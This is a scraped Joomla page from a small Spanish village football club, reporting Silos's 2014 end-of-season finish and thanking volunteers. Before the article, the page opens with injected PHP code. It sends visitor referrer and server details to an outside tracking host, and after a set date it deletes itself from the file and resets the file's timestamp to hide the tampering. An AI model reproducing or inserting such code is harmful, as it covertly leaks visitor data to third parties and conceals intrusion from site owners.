check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Final de temporada

La Afición

Calendario

<<  Mayo 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
  1  2  3  4  5  6  7
  8  91011121314
15161718192021
22232425262728
293031    
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Final de temporada PDF Imprimir E-mail
Domingo, 11 de Mayo de 2014 17:23

Silos da por concluida su participación en la XXXV edición del Trofeo de Fútbol de la diputación de Burgos. Este año debido al cambio de formato en la liguilla se han jugado 30 jornadas, que han dejado a Silos en la 5ª posición del grupo IIB con un total de 52 puntos. Un buen resultado teniendo en cuenta los malos resultados al comienzo de temporada, pues hasta la jornada 6 no se ganó ningún partido.

No obstante lo más importante a destacar este año, es que a pesar de lo corta que era la plantilla se ha conseguido dar la cara en todos los partidos, y además se ha reforzado un grupo que año a año está más unido. El buen ambiente hace que para el año que viene solo necesitemos alguna pequeña incorporación para afrontar con garantías la temporada. Mantener el equipo de fútbol hace que todo los fines de semana Silos esté la actualidad del deporte burgalés, lo que para un pueblo tan pequeño debería ser un gran orgullo. No obstante, también se necesita de un importante esfuerzo económico y de una gran dedicación por parte de la gente que lo hace posible. Por eso, desde el equipo se quiso agradecer a Pepe y David, y a Justo, su trabajo durante todo el año para hacer que nuestro campo esté siempre en las mejores condiciones, así pues los jugadores regalaron a los susodichos sendos jamones y estuches de vino. Además se aprovechó la última jornada de liga para regalar a Rubén, el capitán, un balón firmado por parte de todos los miembros de la plantilla y desearle una pronta recuperación, y una sudadera del club al Padre Dionisio, por su generosidad y dedicación hacia la juventud de Silos.

Esperamos que para el año que viene hagamos un equipo que siga manteniendo el mismo buen ambiente que hay ahora, sigamos dando vida al pueblo, e implicando cada vez a más gente.

¡¡DEPORTIVO!!

 

 

Comentarios  

 
+3 #1 justo 13-05-2014 09:04
Gracias a todos los jugadores por el esfuerzo realizado representando a Silos y disfrutando del futbol.Deportivooooooo oo
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.